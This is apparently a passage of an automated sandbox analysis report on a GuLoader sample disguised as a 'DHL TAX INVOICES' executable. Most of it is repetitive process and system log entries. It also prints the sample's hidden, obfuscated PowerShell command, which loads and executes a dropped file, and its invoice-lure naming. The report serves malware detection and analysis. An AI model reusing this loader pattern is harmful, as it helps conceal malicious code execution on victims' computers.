              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: DHL TAX INVOICES - MARCH 2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbSt source: powershell.exe, 00000001.00000002.2317930133.0000000006D38000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5Q source: powershell.exe, 00000001.00000002.2313644718.000000000079F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000001.00000002.2320109196.0000000007EE6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2313644718.000000000079F000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000001.00000002.2320550123.000000000B115000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Obfuscated command line found
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08881A89 pushad ; ret 1_2_08881A8F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08883082 push ebp; ret 1_2_08883090
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088814AB push es; retf 1_2_088814B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088842D8 pushfd ; ret 1_2_088842E1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088808E5 push 4FBC93B5h; iretd 1_2_0888092A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088838F5 pushad ; ret 1_2_088838FB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08881818 push ecx; retf 1_2_0888182D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08884E17 push eax; retf 1_2_08884E18
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08883679 pushad ; ret 1_2_0888369B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08884BC6 pushad ; ret 1_2_08884BC7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088849F2 pushad ; ret 1_2_088849F3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08881F01 push 00000067h; ret 1_2_08881F03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08881B7E pushad ; ret 1_2_08881B87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04463679 pushad ; ret 7_2_0446369B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04464E17 push eax; retf 7_2_04464E18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04461818 push ecx; retf 7_2_0446182D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_044642D8 pushfd ; ret 7_2_044642E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_044608E5 push 4FBC93B5h; iretd 7_2_0446092A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_044638F5 pushad ; ret 7_2_044638FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04463082 push ebp; ret 7_2_04463090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04461A89 pushad ; ret 7_2_04461A8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_044614AB push es; retf 7_2_044614B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04461B7E pushad ; ret 7_2_04461B87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04461F01 push 00000067h; ret 7_2_04461F03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04464BC6 pushad ; ret 7_2_04464BC7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_044649F2 pushad ; ret 7_2_044649F3
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeFile created: \dhl tax invoices - march 2024.exe
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeFile created: \dhl tax invoices - march 2024.exeJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exeJump to dropped file
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
